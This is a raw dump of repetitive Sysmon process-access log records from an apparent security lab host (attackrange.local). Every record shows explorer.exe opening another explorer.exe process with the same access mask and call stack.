22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 